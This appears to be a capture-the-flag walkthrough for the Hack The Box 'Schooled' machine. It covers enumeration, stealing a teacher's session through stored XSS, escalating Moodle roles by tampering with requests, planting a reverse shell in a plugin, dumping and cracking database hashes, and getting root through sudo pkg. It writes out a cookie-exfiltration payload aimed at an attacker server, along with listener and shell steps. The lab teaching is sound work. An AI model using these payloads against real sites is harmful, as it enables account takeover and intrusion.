Schooled hack the box walkthrough




So in this website, we going to see about the walkthrough or writeup for the schooled hack the box machine and we going to take over the root and user flag from the machine. Let get started.

The video was available on this website (middle and end section)

NAME Schooled

So first connect hack the box VPN and make sure you connected with a schooled machine using the ping

As usual start with a nmap scan 

STEP 1: nmap -sC -sV

The report is shown below

Next, we going to fuzz the directory using gobsuter 

STEP 2: gobuster  dir -u -w /usr/share/dirb/common.txt

Further analyzing this gobuster report nothing should be interesting so next, we will try DNS enumeration and I have found the one domain ( shown in the below image)

So first add this subdomain to the /etc/hosts file ( shown in the below image)

Next, we will try our enumeration 

first, we want to download the wordlist sudo apt install seclists

STEP 3: gobuster vhost schooled.htb -u http://schooled.htb -w /usr/share/seclists/Discovery/DNS/subdomain-top1-million-5000.txt

The report is shown below

Further analyzing this report I have found the one subdomain which moodle.schooled.htb

Next, add this subdomain to the /etc/host file to access this page 

Now we can able to access this page  (shown in the below image)

After seeing this page I have found the login page and we can able create the account.

So now click the create account and it asks the username and password 

password eg: Hacker$12 

And it will ask the email... the email should like this name@schooled.student.htb and enter the username, country, etc...

Now your account will be created. 

next, click the site home tab to enroll in the mathematics course

Why I am enroll in mathematics only?

There are many courses like IT, English, but they are no self-enrollment you cannot able enroll in that course. check it yourself

So that is why I'm enrolling in the maths course so now we are successfully enrolled 

Next, click your profile and there is an edit option click that.

Now you can able to edit. Further analyzing this I have found that this page is affected by XSS vulnerability 

Let us check that  enter the simple javascript in moodlenetprofile 

STEP 4: <script>alert("xss")</script>

After entering this payload it will popup XSS and I found that it is reflected XSS by refreshing that page ( shown in the below image) 

So now we going to steal the cookie by injecting the malicious script.

Whose cookie?

Manuel Phillips cookie because we are enrolled in the mathematics course.

STEP 5: <img src=x onerror=this.src='http://IP:7070/?'+document.cookie;>

Inject the above payload in the moodlenetprofile.

Before that start your python server

STEP 6: python -m http.server 7070

Now you get the cookie in the python server ( shown in the below image)

Download the cookie editor to edit the cookie easily

So next edit the cookie in cookie editor (shown in the below image)

Next refresh that page you will change as the Manuel Phillips

So next we going to become  admin to get the shell first come to the dashboard and click the participant's tab 

So now we going to enroll Lianne carter because she is the manager (shown in the below image)

Now click the enroll button to enroll Lianne carter and choose NON-editing teacher (shown in the below image)

Before that start your burpsuit and capture that request.

Now change the user list as 24 and roleid as 1


Now send that request and turn off your intercept

Again click the enroll button and enroll Lianne carter as manager ( don't capture this in burpsuit)

Now she will be enrolled. 

Open her profile and click log as administrator ( shown in the below image)

Now we become administrators so click the site administrator tab ( shown in the below image)

Next, click the user tab > define roles 

And there are many roles click the manager role

Capture this request in burpsuit by clicking the save change button

Now you can able to see the request ( shown in the below image)

Edit the request and enter the payload download link is below

Before that you should be careful you want to remove which is starting from "&return"

Enter the payload and Forward the request

Next, click the plugin tab and there is an install plugin 

Now we going to inject reverse shell in the plugin so first download the plugin using the below button

After downloading the plugin to your local... unzip the file and their file.

Unzip that rce file there is one PHP file which block_rce.php

Open that and enter the reverse shell you can able download below

And edit the IP and port.

Next, convert the folder to zip file 

Before that start, you listener in netcat

STEP 7: nc -lvp 6060

Now upload that zip file and it will validate your file and click ok

Now you get the shell in your netcat.

Next, we going to find the password for MySQL. 

STEP 8: cd /usr/local/www/apache2/data/moodle

Now you will get the config.php file

STEP 9: cat config.php

Now you will get the MySQL credentials

STEP 10: /usr/local/bin/mysql -u moodle -pplaybookMaster2020 -D moodle -e "show tables;"

Now it will show the tables from the database

STEP 11: /usr/local/bin/mysql  -u moodle -pplaybookMaster2020 -D moodle -e "select * from mdl_user;"

Now you will get the hash for the user of Jamie

Next, we going to crack the hash using hashcat or john

STEP 12: hashcat -m 3200 -a 3 hash.txt /wordlist/rockyou.txt

Now the hash will be cracked ( shown in the below image)

Next, we use the password in ssh

STEP 13: ssh jamie@

Now it will ask for the password so enter the password which is "!QAZ2wsx"


Now you can able to see the user flag which is user.txt

If you don't understand this article please watch the video for user flag

STEP 14: cat user.txt

So next we going to take over the root flag which is root.txt

STEP 15: sudo -l

Now it will show pkg update & pkg install

So let we check in gtfobins

Now you can understand how to escalate the privilege via pkg

So first download the payload 

After downloading the payload follow the below command

First, enter to tmp folder

STEP 16: cd tmp

Next, create one directory to make it simple

STEP 17:mkdir hacked

Now we going to create a file

STEP 18: nano

Enter the downloaded payload and enter your IP and port

Now save the payload and give the permission

STEP 19: chmod 777

Next, we going to execute the payload file

STEP 20: ./

After executing this payload now one txt file will be created ( shown in the below image)

Before start-up your listener in netcat 

STEP 21: nc -lvp 6060

STEP 22: sudo pkg install -y --no-repo-update mypackage-"1.0.5".txt

Now you will get the shell in the netcat 

STEP 23: cd ..

STEP 24: cd root


Now you can able to get the root flag which is root.txt

STEP 25: cat root.txt

If you don't understand this article please watch the video for root flag


I hope you will understand this article if you like this article please donate to us for developing the articles or websites

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